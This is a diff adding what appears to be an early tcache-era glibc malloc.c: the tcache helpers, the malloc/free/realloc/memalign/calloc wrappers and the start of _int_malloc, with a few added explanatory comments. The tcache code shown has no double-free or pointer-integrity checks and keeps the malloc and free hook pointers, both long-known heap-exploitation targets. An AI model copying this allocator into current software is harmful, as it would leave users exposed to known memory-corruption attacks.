+         This avoids problems if first call releases less than we asked,
+         or if failure somehow altered the brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compiler's job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (at the moment, at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    malloc_printerr ("munmap_chunk(): invalid pointer");
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time); this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread bool tcache_shutting_down = false;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static __always_inline void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there are
+   available chunks to remove.  */
+static __always_inline void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
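+
+/* Illustrative sketch, not part of upstream malloc.c: tcache_put pushes
+   onto and tcache_get pops from the head of a singly linked list, so each
+   bin behaves as a LIFO stack, and counts[tc_idx] is meant to mirror the
+   length of entries[tc_idx], which a walk like this would confirm.  */
+static __attribute__ ((unused)) size_t
+tcache_bin_length (const tcache_perthread_struct *tc, size_t tc_idx)
+{
+  size_t n = 0;
+  for (tcache_entry *e = tc->entries[tc_idx]; e != NULL; e = e->next)
+    ++n;
+  return n;                     /* expected to equal (size_t) tc->counts[tc_idx] */
+}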
+
+static void
+tcache_thread_shutdown (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  /* Disable the tcache and prevent it from being reinitialized.  */
+  tcache = NULL;
+  tcache_shutting_down = true;
+
+  /* Free all of the entries and the tcache itself back to the arena
+     heap for coalescing.  */
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+}
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+# define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else  /* !USE_TCACHE */
+# define MAYBE_INIT_TCACHE()
+
+static void
+tcache_thread_shutdown (void)
+{
+  /* Nothing to do if there is no thread cache.  */
+}
+
+#endif /* !USE_TCACHE  */
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* _int_free also calls request2size; be careful not to pad twice.  */
+  size_t tbytes;
+  checked_request2size (bytes, tbytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  if (SINGLE_THREAD_P)
+    {
+      victim = _int_malloc (&main_arena, bytes);
+      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (victim)));
+      return victim;
+    }
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wraps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+      malloc_printerr ("realloc(): invalid pointer");
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+      assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+	      ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+      return newp;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
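+/* [Editor's note -- illustrative, not upstream text.]  The two copy sizes
+   used in __libc_realloc above differ because of how much of a chunk the
+   application may actually use: an in-use heap chunk can spill into the
+   next chunk's prev_size field, so up to oldsize - SIZE_SZ bytes are
+   copied, while a regular mmapped chunk has no successor to borrow from
+   and only oldsize - 2 * SIZE_SZ bytes are usable.  Assuming SIZE_SZ == 8:
+
+     heap chunk of size 0x110     -> copy 0x110 - 0x08  == 0x108 bytes
+     mmapped chunk of size 0x1000 -> copy 0x1000 - 0x10 == 0xff0 bytes
+*/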
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  if (SINGLE_THREAD_P)
+    {
+      p = _int_memalign (&main_arena, alignment, bytes);
+      assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+	      &main_arena == arena_for_chunk (mem2chunk (p)));
+
+      return p;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
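+/* [Editor's note -- illustrative, not upstream text.]  _mid_memalign above
+   quietly rounds a non-power-of-two alignment up to the next power of two
+   rather than failing.  With MALLOC_ALIGNMENT == 16 the loop starts at
+   a == 32, so:
+
+     requested alignment 24 -> a == 32          -> memalign aligns to 32
+     requested alignment 48 -> a == 32, then 64 -> memalign aligns to 64
+*/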
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing is not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
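+/* [Editor's note -- illustrative, not upstream text.]  The
+   HALF_INTERNAL_SIZE_T test in __libc_calloc above lets the common case
+   skip the division: the product n * elem_size can only wrap when at least
+   one factor has a bit set in its upper half, and only then is
+   bytes / elem_size != n evaluated.  On a 64-bit build
+   HALF_INTERNAL_SIZE_T is 2^32, so for example:
+
+     n == 1000, elem_size == 8     -> both below 2^32, no division,
+                                      bytes == 8000
+     n == 2^32, elem_size == 2^32  -> product wraps to 0, the division
+                                      check fails, calloc sets ENOMEM
+                                      and returns NULL
+*/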
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs in which
+     it is called frequently tend to fragment anyway.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the
+     remainder from the most recent non-exact fit.  Place other traversed
+     chunks in bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
